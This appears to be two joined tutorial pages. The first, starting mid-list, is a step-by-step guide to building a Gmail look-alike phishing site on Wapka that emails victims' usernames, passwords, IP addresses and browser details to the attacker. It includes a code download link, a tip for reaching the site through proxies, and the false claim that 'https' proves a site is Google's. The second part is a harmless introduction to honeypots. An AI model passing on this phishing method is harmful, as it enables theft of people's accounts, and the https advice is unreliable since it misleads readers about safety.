3. You have to be knowledgeable of Gmail to some extent.

4. You also should be somehow aware of website creation.

5. You have to have a victim as a target for this attack.

 

What are we about to do now?

We are to create a website that looks exactly like Gmail mobile website. Then, we will receive the victim’s passwords, email id, IP address and browser information, through our email id.

 

Let’s discuss the detailed steps now:

1. Open the Wapka website and get a new account registered on the website.

2. Now, get logged into your new account and navigate through the Site List to create a new one.

3. Type the name of the site, noting that all characters should be in the range of characters a to z  and numbers 0 to 9. Special characters are not allowed.

For example, you can create a username:  newgmail21 and make it @wapka.mobi

4. After clicking “submit”, this should drive you to a screen with two options: either an Admin Mode or User Mode. You should click on “Admin Mode”.

5. A blank page should now appear, which is simply your site to which you have done nothing so far. To start editing your site, click on the link:: EDIT SITE(#):: This link is at the lower rightmost corner of the screen.

6. Click on the Mail form out of all the options which appear to you now.

7. A new screen will appear. You should uncheck “Enable CAPTCHA pictures”.

Now, click “submit”. Also, remember not to set it admin mode.

8. To make your email id as the destination where the victim’s details will be sent, you need to do the following:

A. Navigate through the site list and click with the cursor on your website name. Without                    choosing the Admin Mode, you need to scroll down and hit “Source code viewer”

B. Inside the box, you should type the link to your site. There should appear a screen with some code, search for the word “value=” and take note of the number right beside it.

C. Make the mail form hidden the Admin mode. This could be simply done through the next step, but this is after getting the value=’XXXX..” code.

D. Now click on your site, then choose the Admin mode. You should have a blank site again like what happened before, and now you should also click on “Edit Site”. Afterwards, click on              “Users”.

E. Click now on items visibility, and then you should select X from the drop-down menu.

F. Now, download the following code from this link:

https://www.hacking-tutorial.com/tools/subscribers/index.php?id=hckgml

G. Click on your site again and press the Admin Mode. Now, you should press Edit site and choose “WML/XHTML code”. You should now make use of the code you have just downloaded; copy paste it into this section of WML/XHTML code.

I. Remember to get the value=”XXX..” in the code replaced by the one you extracted just now.

9. Now the phishing website is ready as a design, appearance, and even functionalities. Any victim’s details should now get sent to your email which you used while registering on the Wapka website. The email will be received from [email protected] The details that will be sent should include: User-name and password With IP Address and Browser used by the victim.

10. Congratulations! You can now hack the Gmail account. Well done.

 

Where can’t I use Wapka?

There are two locations where the use of Wapka is impossible:

1. Facebook: any Wapka URLs get blocked by Facebook before sharing them. That’s because people on Facebook try to save their clients to the most possible levels.

2. India: the government there blocked the use of this website inside the country. Even surfing the website is impossible inside India. However, they forgot how a proxy site could do all the magic as mentioned earlier no matter whether the website is blocked in a country or not.

 

How can one prevent himself/herself from getting hacked through Gmail phishing?

1. First of all, you’ve got to make sure that the URL starts with “https” in the URL bar. This ascertains that it is a Google site.

2. If there is a link which refers to any “Free Offer, Free Lottery, Free Insurance, Free Net” etc., it is very highly recommended not to click on the link because it may be a phishing site. This is so common on social media websites such as Whatsapp, or even text SMS messages.

3. Don’t press links sent to you in the email just because a girl has sent it to you. This is actually one of the commonly used phishing methods to trick male guys and motivate them to open the link. This method is one of the trickiest methods of social engineering.

4. So, in a nutshell, try not to get yourself into social engineering to avoid being a victim of phishing in general and Gmail Phishing in particular.

 

Sources

https://www.hacking-tutorial.com/hacking-tutorial/hacking-gmail-using-phishing-method-and-prevention/#sthash.4LzmArQ2.RNipUpcm.dpbs

 

Introduction to Honeypot Security

What is a honeypot?

Why is it important to talk about honeypots?

As the internet becomes more viral among us, we use it for every single task in our daily lives. The security issues related to the usage of the internet becomes much more critical and worth mentioning. We use the internet for different purposes, like sending or receiving emails, purchasing different desired goods online, getting our bills paid through online channels, and playing online games.

However, how much do we know about security and the different potential attacks surrounding us and threatening our “online lives?” In this regard, a victim’s computer may become utilized by an attacker to get through a network and place malicious pieces of code in there as he desires. In the meanwhile, a computer may become exploited to act as a zombie to get other victim systems infected by the code.

Technology always goes on developing and becoming more used in different fields. As a result of this issue, new attacks become used by “bad guys” to do some bad stuff. What we should do in response is to be fond of the security aspects and get to learn how to defend ourselves or our computers against any possible attacks that may have great damage to the system. Honeypots are considered an effective tool of security that has been growingly used in the last decade to defend big networks against any possible attacks that could cause harm to an entire organization.

A honeypot is a well-designed system that aims to get any attacker attracted to it. Accordingly, the behavior of the attacker could be easily monitored when he gets into the honeypot. Any processes initiated by the attacker or any malicious behavior become easily recognized the second after he gets through the trap of honeypot. Thanks to these modifications, accurate information about various types of attacks can be recorded. So, as I just mentioned, a honeypot is simply a trap system or machine, which is intentionally created to look exactly like the actual system such that an attacker gets into the trap and falls into the honeypot.

Why do we essentially do this for? Basically, we need to watch the attacker, analyze his behavior, and understand what he does on our beloved system. We need essentially to know his behavior to protect our actual system against him. This could greatly help us to get to develop more secure systems. This also adds to the network administrators’ knowledge through knowing more about the new ways to get information from a victim machine using forensics tool. Moreover, any new technology attacks become easily well-known of through honeypots such that they become useful for preventing future threats.

There are some ways in which researchers and developers can work to protect the software that they write. Some are proactive, like code reviews and regression testing, while others are reactive, like the pwn2own contest where new vulnerabilities are used to exploit browsers. Some tools can take on aspects of both; one class of these tools are honeypots. The term honeypot was first presented by Lance Spitzner in 1999 in a paper titled To Build a Honeypot.

 

One useful practice to help network administrators get to know about the efficiency of their created honeypot is summarized in this paragraph. It is always advisable that a network administrator builds the honeypot on a machine in which he already knows all the security flaws and weaknesses. Then, the administrator should attempt to break the system and exploit it. In the same time, he should depend on his security forensics tools to investigate the system and identify the tracks which the proposed hacker left behind. In addition to testing for the efficiency of a honeypot, an administrator has to be greatly aware of the proper place to put the honeypot inside the network. Also, he should get to discover what pitfalls the honeypots have on the system or the network.

Honeypots are unique because they allow a security researcher to see and record what actions a malicious user takes on a compromised computer without necessarily interfering or revealing to the attacker that they are being monitored. Because of this invisibility, valuable intelligence can be gathered about the actual strategies of an attacker. A honeypot can be configured to be either proactive or reactive to attacks depending on the needs of the person who set it up.

How can we define honeypots?

A honeypot is essentially a computer system. In this computer system, there exists some files and directories like any other usual computer system. A honeypot aims to attract an attacker to fall into its trap and investigate his actions and follow his behavior. In fact, a honeypot is not an actual system yet it is an intentionally fake system. The difference between a honeypot and other security systems lies in the fact that a variety of security problems could be tackled at once using diverse approaches by depending on honeypots.

On the contrary, other usual security systems are used to tackling one certain problem through a proposed solution. An instance of this point could be seen in the scenario when a compromised system is investigated after having a log of malicious activity. At the same time, new threats could be recognized through implementing a honeypot in a network and hence attempt to tackle these problems and overcome them effectively.

To an outside attacker, honeypots are indistinguishable from the actual production servers. Thus, they will not behave any differently when attacking them. However, the network security team can monitor the honeypots for recorded attacks and later analyze them. The honeypots can also help to absorb attacks directed against the real server.

 

Resources:

http://www.diva-portal.org/smash/get/diva2:327476/fulltext01

https://www2.cs.arizona.edu/~collberg/Teaching/466-566/2012/Resources/presentations/2012/topic12-final/report.pdf